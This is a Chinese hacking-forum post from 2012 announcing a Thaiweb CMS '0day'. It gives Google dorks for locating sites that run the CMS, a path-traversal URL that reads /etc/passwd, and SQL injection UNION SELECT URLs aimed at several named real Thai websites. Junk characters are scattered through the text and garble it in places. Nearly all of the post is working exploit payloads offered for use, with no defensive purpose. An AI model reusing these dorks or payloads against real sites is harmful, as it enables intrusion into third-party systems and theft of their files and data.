找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2185|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Google之:
+ O  u" a# I1 u; Q' B
. j' E! x8 c# N  cintext:powered by Thaiweb% ~6 z9 k/ h( d& G4 L) S' g
7 W, G  e, c6 Z+ v  B
inurl:index.php?page=board.php
" E9 T9 i, q% r- a; j6 t  ?- A3 s9 Y$ S7 o- q0 G5 x; H

, J7 d2 y6 V5 r! w) d' y- q7 A
+ Z0 y, O. N; G/ [. P' z8 r利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
: \1 w  d* A# w7 \6 F0 B- Q$ _1 E" \, Q2 A2 Z8 S3 Q5 E# K
! J) e+ k3 w4 d
2 s3 R  i8 N; q& I1 u8 g
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
7 l* `. F; U9 Z: v, ~3 F( I
: C3 ^3 H$ K# m" h! d5 R: v- k
& f1 {, z% j4 d2 C* @" U! D$ z) b9 E  T9 C
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--6 U' X0 N* O* f0 e$ p( q

  v5 l3 F3 \1 b0 }  A, l. Y. ohttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--# t/ b. ?3 S$ F7 R% D
6 g. L2 t6 y: H
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--- w( S! H6 y) D  X; e, [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表